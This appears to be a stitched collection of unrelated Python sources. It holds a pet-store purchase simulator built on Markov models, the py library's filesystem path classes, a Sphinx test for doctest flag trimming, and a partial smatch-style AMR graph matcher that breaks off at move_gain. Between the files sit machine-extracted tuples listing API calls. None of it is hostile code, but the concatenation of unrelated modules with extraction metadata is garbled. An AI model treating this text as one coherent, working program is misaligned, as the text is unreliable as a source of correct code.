'precision_score', (['true_labels', 'predicted_labels'], {}), '(true_labels, predicted_labels)\n', (1015, 1046), False, 'from sklearn.metrics import f1_score, precision_score, recall_score, accuracy_score, confusion_matrix\n'), ((1232, 1275), 'sklearn.metrics.recall_score', 'recall_score', (['true_labels', 'predicted_labels'], {}), '(true_labels, predicted_labels)\n', (1244, 1275), False, 'from sklearn.metrics import f1_score, precision_score, recall_score, accuracy_score, confusion_matrix\n'), ((1459, 1498), 'sklearn.metrics.f1_score', 'f1_score', (['true_labels', 'predicted_labels'], {}), '(true_labels, predicted_labels)\n', (1467, 1498), False, 'from sklearn.metrics import f1_score, precision_score, recall_score, accuracy_score, confusion_matrix\n'), ((4894, 4926), 'numpy.where', 'np.where', (['(Train_tiles == counter)'], {}), '(Train_tiles == counter)\n', (4902, 4926), True, 'import numpy as np\n'), ((4958, 4990), 'numpy.where', 'np.where', (['(Valid_tiles == counter)'], {}), '(Valid_tiles == counter)\n', (4966, 4990), True, 'import numpy as np\n'), ((5026, 5062), 'numpy.where', 'np.where', (['(Undesired_tiles == counter)'], {}), '(Undesired_tiles == counter)\n', (5034, 5062), True, 'import numpy as np\n'), ((8652, 8687), 'numpy.where', 'np.where', (['(mask_reference_value == 2)'], {}), '(mask_reference_value == 2)\n', (8660, 8687), True, 'import numpy as np\n'), ((5297, 5335), 'numpy.ones', 'np.ones', (['(mask_row - i, patch_dim_col)'], {}), '((mask_row - i, patch_dim_col))\n', (5304, 5335), True, 'import numpy as np\n'), ((5570, 5608), 'numpy.ones', 'np.ones', (['(mask_row - i, patch_dim_col)'], {}), '((mask_row - i, patch_dim_col))\n', (5577, 5608), True, 'import numpy as np\n'), ((5851, 5889), 'numpy.ones', 'np.ones', (['(mask_row - i, patch_dim_col)'], {}), '((mask_row - i, patch_dim_col))\n', (5858, 5889), True, 'import numpy as np\n'), ((9228, 9263), 'numpy.where', 'np.where', (['(mask_reference_value == 1)'], {}), '(mask_reference_value == 1)\n', (9236, 9263), True, 'import numpy as np\n'), ((9680, 9715), 'numpy.where', 'np.where', (['(mask_reference_value == 3)'], {}), '(mask_reference_value == 3)\n', (9688, 9715), True, 'import numpy as np\n')]
|
from collections import defaultdict
import math
import random
import hashlib
from markovmodel import MarkovModelBuilder
from samplers import RouletteWheelSampler
class ItemCategoryMarkovModelBuilder(object):
def __init__(self, item_category=None, customer=None):
self.item_category = item_category
self.customer = customer
def _normalize_field_weights(self):
weight_sum = sum(self.field_weights.itervalues())
for field, weight in list(self.field_weights.iteritems()):
self.field_weights[field] = weight / weight_sum
def _generate_transition_parameters(self):
self.field_weights = dict()
self.field_similarity_weights = dict()
for field in self.item_category.fields:
avg = random.choice([0.15, 0.85])
self.field_weights[field] = min(0.95, max(0.05, random.normalvariate(avg, 0.1)))
avg = random.choice([0.15, 0.85])
self.field_similarity_weights[field] = min(0.95, max(0.05, random.normalvariate(avg, 0.1)))
avg = random.choice([0.25, 0.75])
self.loopback_weight = min(0.95, max(0.05, random.normalvariate(avg, 0.1)))
def similarity_weight(self, rec1, rec2):
weight = 0.0
for field in self.item_category.fields:
if rec1[field] == rec2[field]:
weight += self.field_weights[field] * self.field_similarity_weights[field]
else:
weight += self.field_weights[field] * (1.0 - self.field_similarity_weights[field])
return weight
def create_markov_model(self):
self._generate_transition_parameters()
self._normalize_field_weights()
builder = MarkovModelBuilder()
for rec in self.item_category.items:
builder.add_state(tuple(rec.items()))
weight_sum = 0.0
for other_rec in self.item_category.items:
if rec != other_rec:
weight_sum += self.similarity_weight(rec, other_rec)
for other_rec in self.item_category.items:
weight = 0.0
if rec != other_rec:
weight = (1.0 - self.loopback_weight) * self.similarity_weight(rec, other_rec) / weight_sum
else:
weight = self.loopback_weight
builder.add_edge_weight(tuple(rec.items()), tuple(other_rec.items()), weight)
return builder.build_msm()
class Transaction(object):
def __init__(self, customer=None, trans_time=None, purchased_items=None, store=None,
trans_count=None):
self.store = store
self.customer = customer
self.trans_time = trans_time
self.purchased_items = purchased_items
self.trans_count = trans_count
def transaction_id(self):
return hashlib.md5(repr(self)).hexdigest()
def __repr__(self):
return "(%s, %s, %s, %s)" % (self.store.id,
self.customer.id,
self.trans_time,
self.trans_count)
class TransactionPurchasesSimulator(object):
def __init__(self, customer_state=None, item_categories=None):
self.customer_state = customer_state
self.item_purchases_msms = dict()
for category_label, category_data in item_categories.iteritems():
num_pets = 0
for species in category_data.species:
num_pets += customer_state.customer.pets[species]
if num_pets > 0:
builder = ItemCategoryMarkovModelBuilder(item_category=category_data,
customer=customer_state.customer)
self.item_purchases_msms[category_label] = builder.create_markov_model()
msm = self.item_purchases_msms[category_label]
def choose_category(self, trans_time=None, num_purchases=None):
category_weights = self.customer_state.item_category_weights(trans_time)
if num_purchases != 0:
category_weights.append(("stop", 0.1))
weight_sum = 0.0
for category, weight in category_weights:
weight_sum += weight
category_probabilities = []
for category, weight in category_weights:
category_probabilities.append((category, weight / weight_sum))
sampler = RouletteWheelSampler(category_probabilities)
return sampler.sample()
def choose_item(self, category):
item = self.item_purchases_msms[category].progress_state()
return item
def update_usage_simulations(self, trans_time=None, item=None):
self.customer_state.update_inventory(trans_time, item)
def simulate(self, trans_time=None):
trans_items = []
purchases = 0
while True:
category = self.choose_category(trans_time=trans_time,
num_purchases=purchases)
if category == "stop":
break
item = self.choose_item(category)
self.update_usage_simulations(trans_time=trans_time,
item=item)
purchases += 1
trans_items.append(item)
return trans_items
class TransactionTimeSampler(object):
def __init__(self, customer_state=None):
self.customer_state = customer_state
def propose_transaction_time(self):
return self.customer_state.propose_transaction_time()
def transaction_time_probability(self, proposed_trans_time, last_trans_time):
if proposed_trans_time >= last_trans_time:
return 1.0
else:
return 0.0
def sample(self, last_trans_time):
while True:
proposed_time = self.propose_transaction_time()
prob = self.transaction_time_probability(proposed_time, last_trans_time)
r = random.random()
if r < prob:
return proposed_time
class TransactionSimulator(object):
def __init__(self, stores=None, customer_state=None, item_categories=None):
self.stores = stores
self.customer_state = customer_state
self.trans_time_sampler = TransactionTimeSampler(customer_state=customer_state)
self.purchase_sim = TransactionPurchasesSimulator(customer_state=self.customer_state, item_categories=item_categories)
self.trans_count = 0
def simulate(self, end_time):
last_trans_time = 0.0
while True:
trans_time = self.trans_time_sampler.sample(last_trans_time)
if trans_time > end_time:
break
purchased_items = self.purchase_sim.simulate(trans_time=trans_time)
trans = Transaction(customer=self.customer_state.customer,
purchased_items=purchased_items,
trans_time=trans_time,
trans_count=self.trans_count,
store=random.choice(self.stores))
self.trans_count += 1
last_trans_time = trans_time
yield trans
|
[
"random.normalvariate",
"markovmodel.MarkovModelBuilder",
"random.choice",
"random.random",
"samplers.RouletteWheelSampler"
] |
[((1056, 1083), 'random.choice', 'random.choice', (['[0.25, 0.75]'], {}), '([0.25, 0.75])\n', (1069, 1083), False, 'import random\n'), ((1698, 1718), 'markovmodel.MarkovModelBuilder', 'MarkovModelBuilder', ([], {}), '()\n', (1716, 1718), False, 'from markovmodel import MarkovModelBuilder\n'), ((4395, 4439), 'samplers.RouletteWheelSampler', 'RouletteWheelSampler', (['category_probabilities'], {}), '(category_probabilities)\n', (4415, 4439), False, 'from samplers import RouletteWheelSampler\n'), ((771, 798), 'random.choice', 'random.choice', (['[0.15, 0.85]'], {}), '([0.15, 0.85])\n', (784, 798), False, 'import random\n'), ((910, 937), 'random.choice', 'random.choice', (['[0.15, 0.85]'], {}), '([0.15, 0.85])\n', (923, 937), False, 'import random\n'), ((6005, 6020), 'random.random', 'random.random', ([], {}), '()\n', (6018, 6020), False, 'import random\n'), ((1135, 1165), 'random.normalvariate', 'random.normalvariate', (['avg', '(0.1)'], {}), '(avg, 0.1)\n', (1155, 1165), False, 'import random\n'), ((859, 889), 'random.normalvariate', 'random.normalvariate', (['avg', '(0.1)'], {}), '(avg, 0.1)\n', (879, 889), False, 'import random\n'), ((1009, 1039), 'random.normalvariate', 'random.normalvariate', (['avg', '(0.1)'], {}), '(avg, 0.1)\n', (1029, 1039), False, 'import random\n'), ((7127, 7153), 'random.choice', 'random.choice', (['self.stores'], {}), '(self.stores)\n', (7140, 7153), False, 'import random\n')]
|
"""
"""
import os, sys, posixpath
import py
# Moved from local.py.
iswin32 = sys.platform == "win32" or (getattr(os, '_name', False) == 'nt')
class Checkers:
_depend_on_existence = 'exists', 'link', 'dir', 'file'
def __init__(self, path):
self.path = path
def dir(self):
raise NotImplementedError
def file(self):
raise NotImplementedError
def dotfile(self):
return self.path.basename.startswith('.')
def ext(self, arg):
if not arg.startswith('.'):
arg = '.' + arg
return self.path.ext == arg
def exists(self):
raise NotImplementedError
def basename(self, arg):
return self.path.basename == arg
def basestarts(self, arg):
return self.path.basename.startswith(arg)
def relto(self, arg):
return self.path.relto(arg)
def fnmatch(self, arg):
return self.path.fnmatch(arg)
def endswith(self, arg):
return str(self.path).endswith(arg)
def _evaluate(self, kw):
for name, value in kw.items():
invert = False
meth = None
try:
meth = getattr(self, name)
except AttributeError:
if name[:3] == 'not':
invert = True
try:
meth = getattr(self, name[3:])
except AttributeError:
pass
if meth is None:
raise TypeError(
"no %r checker available for %r" % (name, self.path))
try:
if py.code.getrawcode(meth).co_argcount > 1:
if (not meth(value)) ^ invert:
return False
else:
if bool(value) ^ bool(meth()) ^ invert:
return False
except (py.error.ENOENT, py.error.ENOTDIR, py.error.EBUSY):
# EBUSY feels not entirely correct,
# but its kind of necessary since ENOMEDIUM
# is not accessible in python
for name in self._depend_on_existence:
if name in kw:
if kw.get(name):
return False
name = 'not' + name
if name in kw:
if not kw.get(name):
return False
return True
class NeverRaised(Exception):
pass
class PathBase(object):
""" shared implementation for filesystem path objects."""
Checkers = Checkers
def __div__(self, other):
return self.join(str(other))
__truediv__ = __div__ # py3k
def basename(self):
""" basename part of path. """
return self._getbyspec('basename')[0]
basename = property(basename, None, None, basename.__doc__)
def dirname(self):
""" dirname part of path. """
return self._getbyspec('dirname')[0]
dirname = property(dirname, None, None, dirname.__doc__)
def purebasename(self):
""" pure base name of the path."""
return self._getbyspec('purebasename')[0]
purebasename = property(purebasename, None, None, purebasename.__doc__)
def ext(self):
""" extension of the path (including the '.')."""
return self._getbyspec('ext')[0]
ext = property(ext, None, None, ext.__doc__)
def dirpath(self, *args, **kwargs):
""" return the directory Path of the current Path joined
with any given path arguments.
"""
return self.new(basename='').join(*args, **kwargs)
def read_binary(self):
""" read and return a bytestring from reading the path. """
with self.open('rb') as f:
return f.read()
def read_text(self, encoding):
""" read and return a Unicode string from reading the path. """
with self.open("r", encoding=encoding) as f:
return f.read()
def read(self, mode='r'):
""" read and return a bytestring from reading the path. """
with self.open(mode) as f:
return f.read()
def readlines(self, cr=1):
""" read and return a list of lines from the path. if cr is False, the
newline will be removed from the end of each line. """
if not cr:
content = self.read('rU')
return content.split('\n')
else:
f = self.open('rU')
try:
return f.readlines()
finally:
f.close()
def load(self):
""" (deprecated) return object unpickled from self.read() """
f = self.open('rb')
try:
return py.error.checked_call(py.std.pickle.load, f)
finally:
f.close()
def move(self, target):
""" move this path to target. """
if target.relto(self):
raise py.error.EINVAL(target,
"cannot move path into a subdirectory of itself")
try:
self.rename(target)
except py.error.EXDEV: # invalid cross-device link
self.copy(target)
self.remove()
def __repr__(self):
""" return a string representation of this path. """
return repr(str(self))
def check(self, **kw):
""" check a path for existence and properties.
Without arguments, return True if the path exists, otherwise False.
valid checkers::
file=1 # is a file
file=0 # is not a file (may not even exist)
dir=1 # is a dir
link=1 # is a link
exists=1 # exists
You can specify multiple checker definitions, for example::
path.check(file=1, link=1) # a link pointing to a file
"""
if not kw:
kw = {'exists' : 1}
return self.Checkers(self)._evaluate(kw)
def fnmatch(self, pattern):
"""return true if the basename/fullname matches the glob-'pattern'.
valid pattern characters::
* matches everything
? matches any single character
[seq] matches any character in seq
[!seq] matches any char not in seq
If the pattern contains a path-separator then the full path
is used for pattern matching and a '*' is prepended to the
pattern.
if the pattern doesn't contain a path-separator the pattern
is only matched against the basename.
"""
return FNMatcher(pattern)(self)
def relto(self, relpath):
""" return a string which is the relative part of the path
to the given 'relpath'.
"""
if not isinstance(relpath, (str, PathBase)):
raise TypeError("%r: not a string or path object" %(relpath,))
strrelpath = str(relpath)
if strrelpath and strrelpath[-1] != self.sep:
strrelpath += self.sep
#assert strrelpath[-1] == self.sep
#assert strrelpath[-2] != self.sep
strself = str(self)
if sys.platform == "win32" or getattr(os, '_name', None) == 'nt':
if os.path.normcase(strself).startswith(
os.path.normcase(strrelpath)):
return strself[len(strrelpath):]
elif strself.startswith(strrelpath):
return strself[len(strrelpath):]
return ""
def ensure_dir(self, *args):
""" ensure the path joined with args is a directory. """
return self.ensure(*args, **{"dir": True})
def bestrelpath(self, dest):
""" return a string which is a relative path from self
(assumed to be a directory) to dest such that
self.join(bestrelpath) == dest and if not such
path can be determined return dest.
"""
try:
if self == dest:
return os.curdir
base = self.common(dest)
if not base: # can be the case on windows
return str(dest)
self2base = self.relto(base)
reldest = dest.relto(base)
if self2base:
n = self2base.count(self.sep) + 1
else:
n = 0
l = [os.pardir] * n
if reldest:
l.append(reldest)
target = dest.sep.join(l)
return target
except AttributeError:
return str(dest)
def exists(self):
return self.check()
def isdir(self):
return self.check(dir=1)
def isfile(self):
return self.check(file=1)
def parts(self, reverse=False):
""" return a root-first list of all ancestor directories
plus the path itself.
"""
current = self
l = [self]
while 1:
last = current
current = current.dirpath()
if last == current:
break
l.append(current)
if not reverse:
l.reverse()
return l
def common(self, other):
""" return the common part shared with the other path
or None if there is no common part.
"""
last = None
for x, y in zip(self.parts(), other.parts()):
if x != y:
return last
last = x
return last
def __add__(self, other):
""" return new path object with 'other' added to the basename"""
return self.new(basename=self.basename+str(other))
def __cmp__(self, other):
""" return sort value (-1, 0, +1). """
try:
return cmp(self.strpath, other.strpath)
except AttributeError:
return cmp(str(self), str(other)) # self.path, other.path)
def __lt__(self, other):
try:
return self.strpath < other.strpath
except AttributeError:
return str(self) < str(other)
def visit(self, fil=None, rec=None, ignore=NeverRaised, bf=False, sort=False):
""" yields all paths below the current one
fil is a filter (glob pattern or callable), if not matching the
path will not be yielded, defaulting to None (everything is
returned)
rec is a filter (glob pattern or callable) that controls whether
a node is descended, defaulting to None
ignore is an Exception class that is ignoredwhen calling dirlist()
on any of the paths (by default, all exceptions are reported)
bf if True will cause a breadthfirst search instead of the
default depthfirst. Default: False
sort if True will sort entries within each directory level.
"""
for x in Visitor(fil, rec, ignore, bf, sort).gen(self):
yield x
def _sortlist(self, res, sort):
if sort:
if hasattr(sort, '__call__'):
res.sort(sort)
else:
res.sort()
def samefile(self, other):
""" return True if other refers to the same stat object as self. """
return self.strpath == str(other)
class Visitor:
def __init__(self, fil, rec, ignore, bf, sort):
if isinstance(fil, str):
fil = FNMatcher(fil)
if isinstance(rec, str):
self.rec = FNMatcher(rec)
elif not hasattr(rec, '__call__') and rec:
self.rec = lambda path: True
else:
self.rec = rec
self.fil = fil
self.ignore = ignore
self.breadthfirst = bf
self.optsort = sort and sorted or (lambda x: x)
def gen(self, path):
try:
entries = path.listdir()
except self.ignore:
return
rec = self.rec
dirs = self.optsort([p for p in entries
if p.check(dir=1) and (rec is None or rec(p))])
if not self.breadthfirst:
for subdir in dirs:
for p in self.gen(subdir):
yield p
for p in self.optsort(entries):
if self.fil is None or self.fil(p):
yield p
if self.breadthfirst:
for subdir in dirs:
for p in self.gen(subdir):
yield p
class FNMatcher:
def __init__(self, pattern):
self.pattern = pattern
def __call__(self, path):
pattern = self.pattern
if (pattern.find(path.sep) == -1 and
iswin32 and
pattern.find(posixpath.sep) != -1):
# Running on Windows, the pattern has no Windows path separators,
# and the pattern has one or more Posix path separators. Replace
# the Posix path separators with the Windows path separator.
pattern = pattern.replace(posixpath.sep, path.sep)
if pattern.find(path.sep) == -1:
name = path.basename
else:
name = str(path) # path.strpath # XXX svn?
if not os.path.isabs(pattern):
pattern = '*' + path.sep + pattern
return py.std.fnmatch.fnmatch(name, pattern)
|
[
"os.path.isabs",
"py.code.getrawcode",
"py.std.fnmatch.fnmatch",
"py.error.EINVAL",
"py.error.checked_call",
"os.path.normcase"
] |
[((13045, 13082), 'py.std.fnmatch.fnmatch', 'py.std.fnmatch.fnmatch', (['name', 'pattern'], {}), '(name, pattern)\n', (13067, 13082), False, 'import py\n'), ((4691, 4735), 'py.error.checked_call', 'py.error.checked_call', (['py.std.pickle.load', 'f'], {}), '(py.std.pickle.load, f)\n', (4712, 4735), False, 'import py\n'), ((4895, 4968), 'py.error.EINVAL', 'py.error.EINVAL', (['target', '"""cannot move path into a subdirectory of itself"""'], {}), "(target, 'cannot move path into a subdirectory of itself')\n", (4910, 4968), False, 'import py\n'), ((7227, 7255), 'os.path.normcase', 'os.path.normcase', (['strrelpath'], {}), '(strrelpath)\n', (7243, 7255), False, 'import os, sys, posixpath\n'), ((12955, 12977), 'os.path.isabs', 'os.path.isabs', (['pattern'], {}), '(pattern)\n', (12968, 12977), False, 'import os, sys, posixpath\n'), ((7174, 7199), 'os.path.normcase', 'os.path.normcase', (['strself'], {}), '(strself)\n', (7190, 7199), False, 'import os, sys, posixpath\n'), ((1608, 1632), 'py.code.getrawcode', 'py.code.getrawcode', (['meth'], {}), '(meth)\n', (1626, 1632), False, 'import py\n')]
|
"""
test_transforms_post_transforms_code
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
:copyright: Copyright 2007-2020 by the Sphinx team, see AUTHORS.
:license: BSD, see LICENSE for details.
"""
import pytest
@pytest.mark.sphinx('html', testroot='trim_doctest_flags')
def test_trim_doctest_flags_html(app, status, warning):
app.build()
result = (app.outdir / 'index.html').read_text()
assert 'FOO' not in result
assert 'BAR' in result
assert 'BAZ' not in result
assert 'QUX' not in result
assert 'QUUX' not in result
@pytest.mark.sphinx('latex', testroot='trim_doctest_flags')
def test_trim_doctest_flags_latex(app, status, warning):
app.build()
result = (app.outdir / 'python.tex').read_text()
assert 'FOO' not in result
assert 'BAR' in result
assert 'BAZ' not in result
assert 'QUX' not in result
assert 'QUUX' not in result
|
[
"pytest.mark.sphinx"
] |
[((222, 279), 'pytest.mark.sphinx', 'pytest.mark.sphinx', (['"""html"""'], {'testroot': '"""trim_doctest_flags"""'}), "('html', testroot='trim_doctest_flags')\n", (240, 279), False, 'import pytest\n'), ((561, 619), 'pytest.mark.sphinx', 'pytest.mark.sphinx', (['"""latex"""'], {'testroot': '"""trim_doctest_flags"""'}), "('latex', testroot='trim_doctest_flags')\n", (579, 619), False, 'import pytest\n')]
|
# adapt from amrlib smatch file used for approximating the largest common supgraph between two AMRs
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import re
import random
import amr
import sys
# total number of iteration in smatch computation
import penman
from penman.models.noop import NoOpModel
iteration_num = 5
# verbose output switch.
# Default false (no verbose output)
verbose = False
veryVerbose = False
# single score output switch.
# Default true (compute a single score for all AMRs in two files)
single_score = True
# precision and recall output switch.
# Default false (do not output precision and recall, just output F score)
pr_flag = False
# Error log location
ERROR_LOG = sys.stderr
# Debug log location
DEBUG_LOG = sys.stderr
# dictionary to save pre-computed node mapping and its resulting triple match count
# key: tuples of node mapping
# value: the matching triple count
match_triple_dict = {}
def get_best_match(instance1, attribute1, relation1,
instance2, attribute2, relation2,
prefix1, prefix2, doinstance=True, doattribute=True, dorelation=True):
"""
Get the highest triple match number between two sets of triples via hill-climbing.
Arguments:
instance1: instance triples of AMR 1 ("instance", node name, node value)
attribute1: attribute triples of AMR 1 (attribute name, node name, attribute value)
relation1: relation triples of AMR 1 (relation name, node 1 name, node 2 name)
instance2: instance triples of AMR 2 ("instance", node name, node value)
attribute2: attribute triples of AMR 2 (attribute name, node name, attribute value)
relation2: relation triples of AMR 2 (relation name, node 1 name, node 2 name)
prefix1: prefix label for AMR 1
prefix2: prefix label for AMR 2
Returns:
best_match: the node mapping that results in the highest triple matching number
best_match_num: the highest triple matching number
"""
# Compute candidate pool - all possible node match candidates.
# In the hill-climbing, we only consider candidate in this pool to save computing time.
# weight_dict is a dictionary that maps a pair of node
(candidate_mappings, weight_dict) = compute_pool(instance1, attribute1, relation1,
instance2, attribute2, relation2,
prefix1, prefix2, doinstance=doinstance, doattribute=doattribute,
dorelation=dorelation)
if veryVerbose:
print("Candidate mappings:", file=DEBUG_LOG)
print(candidate_mappings, file=DEBUG_LOG)
print("Weight dictionary", file=DEBUG_LOG)
print(weight_dict, file=DEBUG_LOG)
best_match_num = 0
# initialize best match mapping
# the ith entry is the node index in AMR 2 which maps to the ith node in AMR 1
best_mapping = [-1] * len(instance1)
for i in range(iteration_num):
if veryVerbose:
print("Iteration", i, file=DEBUG_LOG)
if i == 0:
# smart initialization used for the first round
cur_mapping = smart_init_mapping(candidate_mappings, instance1, instance2)
else:
# random initialization for the other round
cur_mapping = random_init_mapping(candidate_mappings)
# compute current triple match number
match_num = compute_match(cur_mapping, weight_dict)
if veryVerbose:
print("Node mapping at start", cur_mapping, file=DEBUG_LOG)
print("Triple match number at start:", match_num, file=DEBUG_LOG)
while True:
# get best gain
(gain, new_mapping) = get_best_gain(cur_mapping, candidate_mappings, weight_dict,
len(instance2), match_num)
if veryVerbose:
print("Gain after the hill-climbing", gain, file=DEBUG_LOG)
# hill-climbing until there will be no gain for new node mapping
if gain <= 0:
break
# otherwise update match_num and mapping
match_num += gain
cur_mapping = new_mapping[:]
if veryVerbose:
print("Update triple match number to:", match_num, file=DEBUG_LOG)
print("Current mapping:", cur_mapping, file=DEBUG_LOG)
if match_num > best_match_num:
best_mapping = cur_mapping[:]
best_match_num = match_num
return best_mapping, best_match_num
def rename_node(amr, prefix):
"""
Rename AMR graph nodes to prefix + node_index to avoid nodes with the same name in two different AMRs.
"""
node_map_dict = {}
inverse_node_map_dict = {}
# map each node to its new name (e.g. "a1")
for i in range(0, len(amr.nodes)):
node_map_dict[amr.nodes[i]] = prefix + str(i)
# update node name
for i, v in enumerate(amr.nodes):
amr.nodes[i] = node_map_dict[v]
# update node name in relations
for node_relations in amr.relations:
for i, l in enumerate(node_relations):
node_relations[i][1] = node_map_dict[l[1]]
for k,v in node_map_dict.items():
inverse_node_map_dict[v] = k
return inverse_node_map_dict
def normalize(item):
"""
lowercase and remove quote signifiers from items that are about to be compared
"""
return item.lower().rstrip('_')
def compute_pool(instance1, attribute1, relation1,
instance2, attribute2, relation2,
prefix1, prefix2, doinstance=True, doattribute=True, dorelation=True):
"""
compute all possible node mapping candidates and their weights (the triple matching number gain resulting from
mapping one node in AMR 1 to another node in AMR2)
Arguments:
instance1: instance triples of AMR 1
attribute1: attribute triples of AMR 1 (attribute name, node name, attribute value)
relation1: relation triples of AMR 1 (relation name, node 1 name, node 2 name)
instance2: instance triples of AMR 2
attribute2: attribute triples of AMR 2 (attribute name, node name, attribute value)
relation2: relation triples of AMR 2 (relation name, node 1 name, node 2 name
prefix1: prefix label for AMR 1
prefix2: prefix label for AMR 2
Returns:
candidate_mapping: a list of candidate nodes.
The ith element contains the node indices (in AMR 2) the ith node (in AMR 1) can map to.
(resulting in non-zero triple match)
weight_dict: a dictionary which contains the matching triple number for every pair of node mapping. The key
is a node pair. The value is another dictionary. key {-1} is triple match resulting from this node
pair alone (instance triples and attribute triples), and other keys are node pairs that can result
in relation triple match together with the first node pair.
"""
candidate_mapping = []
weight_dict = {}
for instance1_item in instance1:
# each candidate mapping is a set of node indices
candidate_mapping.append(set())
if doinstance:
for instance2_item in instance2:
# if both triples are instance triples and have the same value
if normalize(instance1_item[0]) == normalize(instance2_item[0]) and \
normalize(instance1_item[2]) == normalize(instance2_item[2]):
# get node index by stripping the prefix
node1_index = int(instance1_item[1][len(prefix1):])
node2_index = int(instance2_item[1][len(prefix2):])
candidate_mapping[node1_index].add(node2_index)
node_pair = (node1_index, node2_index)
# use -1 as key in weight_dict for instance triples and attribute triples
if node_pair in weight_dict:
weight_dict[node_pair][-1] += 1
else:
weight_dict[node_pair] = {}
weight_dict[node_pair][-1] = 1
if doattribute:
for attribute1_item in attribute1:
for attribute2_item in attribute2:
# if both attribute relation triple have the same relation name and value
if normalize(attribute1_item[0]) == normalize(attribute2_item[0]) \
and normalize(attribute1_item[2]) == normalize(attribute2_item[2]):
node1_index = int(attribute1_item[1][len(prefix1):])
node2_index = int(attribute2_item[1][len(prefix2):])
candidate_mapping[node1_index].add(node2_index)
node_pair = (node1_index, node2_index)
# use -1 as key in weight_dict for instance triples and attribute triples
if node_pair in weight_dict:
weight_dict[node_pair][-1] += 1
else:
weight_dict[node_pair] = {}
weight_dict[node_pair][-1] = 1
if dorelation:
for relation1_item in relation1:
for relation2_item in relation2:
# if both relation share the same name
if normalize(relation1_item[0]) == normalize(relation2_item[0]):
node1_index_amr1 = int(relation1_item[1][len(prefix1):])
node1_index_amr2 = int(relation2_item[1][len(prefix2):])
node2_index_amr1 = int(relation1_item[2][len(prefix1):])
node2_index_amr2 = int(relation2_item[2][len(prefix2):])
# add mapping between two nodes
candidate_mapping[node1_index_amr1].add(node1_index_amr2)
candidate_mapping[node2_index_amr1].add(node2_index_amr2)
node_pair1 = (node1_index_amr1, node1_index_amr2)
node_pair2 = (node2_index_amr1, node2_index_amr2)
if node_pair2 != node_pair1:
# update weight_dict weight. Note that we need to update both entries for future search
# i.e weight_dict[node_pair1][node_pair2]
# weight_dict[node_pair2][node_pair1]
if node1_index_amr1 > node2_index_amr1:
# swap node_pair1 and node_pair2
node_pair1 = (node2_index_amr1, node2_index_amr2)
node_pair2 = (node1_index_amr1, node1_index_amr2)
if node_pair1 in weight_dict:
if node_pair2 in weight_dict[node_pair1]:
weight_dict[node_pair1][node_pair2] += 1
else:
weight_dict[node_pair1][node_pair2] = 1
else:
weight_dict[node_pair1] = {-1: 0, node_pair2: 1}
if node_pair2 in weight_dict:
if node_pair1 in weight_dict[node_pair2]:
weight_dict[node_pair2][node_pair1] += 1
else:
weight_dict[node_pair2][node_pair1] = 1
else:
weight_dict[node_pair2] = {-1: 0, node_pair1: 1}
else:
# two node pairs are the same. So we only update weight_dict once.
# this generally should not happen.
if node_pair1 in weight_dict:
weight_dict[node_pair1][-1] += 1
else:
weight_dict[node_pair1] = {-1: 1}
return candidate_mapping, weight_dict
def smart_init_mapping(candidate_mapping, instance1, instance2):
"""
Initialize mapping based on the concept mapping (smart initialization)
Arguments:
candidate_mapping: candidate node match list
instance1: instance triples of AMR 1
instance2: instance triples of AMR 2
Returns:
initialized node mapping between two AMRs
"""
random.seed()
matched_dict = {}
result = []
# list to store node indices that have no concept match
no_word_match = []
for i, candidates in enumerate(candidate_mapping):
if not candidates:
# no possible mapping
result.append(-1)
continue
# node value in instance triples of AMR 1
value1 = instance1[i][2]
for node_index in candidates:
value2 = instance2[node_index][2]
# find the first instance triple match in the candidates
# instance triple match is having the same concept value
if value1 == value2:
if node_index not in matched_dict:
result.append(node_index)
matched_dict[node_index] = 1
break
if len(result) == i:
no_word_match.append(i)
result.append(-1)
# if no concept match, generate a random mapping
for i in no_word_match:
candidates = list(candidate_mapping[i])
while candidates:
# get a random node index from candidates
rid = random.randint(0, len(candidates) - 1)
candidate = candidates[rid]
if candidate in matched_dict:
candidates.pop(rid)
else:
matched_dict[candidate] = 1
result[i] = candidate
break
return result
def random_init_mapping(candidate_mapping):
"""
Generate a random node mapping.
Args:
candidate_mapping: candidate_mapping: candidate node match list
Returns:
randomly-generated node mapping between two AMRs
"""
# if needed, a fixed seed could be passed here to generate same random (to help debugging)
random.seed()
matched_dict = {}
result = []
for c in candidate_mapping:
candidates = list(c)
if not candidates:
# -1 indicates no possible mapping
result.append(-1)
continue
found = False
while candidates:
# randomly generate an index in [0, length of candidates)
rid = random.randint(0, len(candidates) - 1)
candidate = candidates[rid]
# check if it has already been matched
if candidate in matched_dict:
candidates.pop(rid)
else:
matched_dict[candidate] = 1
result.append(candidate)
found = True
break
if not found:
result.append(-1)
return result
def compute_match(mapping, weight_dict):
"""
Given a node mapping, compute match number based on weight_dict.
Args:
mappings: a list of node index in AMR 2. The ith element (value j) means node i in AMR 1 maps to node j in AMR 2.
Returns:
matching triple number
Complexity: O(m*n) , m is the node number of AMR 1, n is the node number of AMR 2
"""
# If this mapping has been investigated before, retrieve the value instead of re-computing.
if veryVerbose:
print("Computing match for mapping", file=DEBUG_LOG)
print(mapping, file=DEBUG_LOG)
if tuple(mapping) in match_triple_dict:
if veryVerbose:
print("saved value", match_triple_dict[tuple(mapping)], file=DEBUG_LOG)
return match_triple_dict[tuple(mapping)]
match_num = 0
# i is node index in AMR 1, m is node index in AMR 2
for i, m in enumerate(mapping):
if m == -1:
# no node maps to this node
continue
# node i in AMR 1 maps to node m in AMR 2
current_node_pair = (i, m)
if current_node_pair not in weight_dict:
continue
if veryVerbose:
print("node_pair", current_node_pair, file=DEBUG_LOG)
for key in weight_dict[current_node_pair]:
if key == -1:
# matching triple resulting from instance/attribute triples
match_num += weight_dict[current_node_pair][key]
if veryVerbose:
print("instance/attribute match", weight_dict[current_node_pair][key], file=DEBUG_LOG)
# only consider node index larger than i to avoid duplicates
# as we store both weight_dict[node_pair1][node_pair2] and
# weight_dict[node_pair2][node_pair1] for a relation
elif key[0] < i:
continue
elif mapping[key[0]] == key[1]:
match_num += weight_dict[current_node_pair][key]
if veryVerbose:
print("relation match with", key, weight_dict[current_node_pair][key], file=DEBUG_LOG)
if veryVerbose:
print("match computing complete, result:", match_num, file=DEBUG_LOG)
# update match_triple_dict
match_triple_dict[tuple(mapping)] = match_num
return match_num
def move_gain(mapping, node_id, old_id, new_id, weight_dict, match_num):
"""
Compute the triple match number gain from the move operation
Arguments:
mapping: current node mapping
node_id: remapped node in AMR 1
old_id: original node id in AMR 2 to which node_id is mapped
new_id: new node in to which node_id is mapped
weight_dict: weight dictionary
match_num: the original triple matching number
Returns:
the triple match gain number (might be negative)
"""
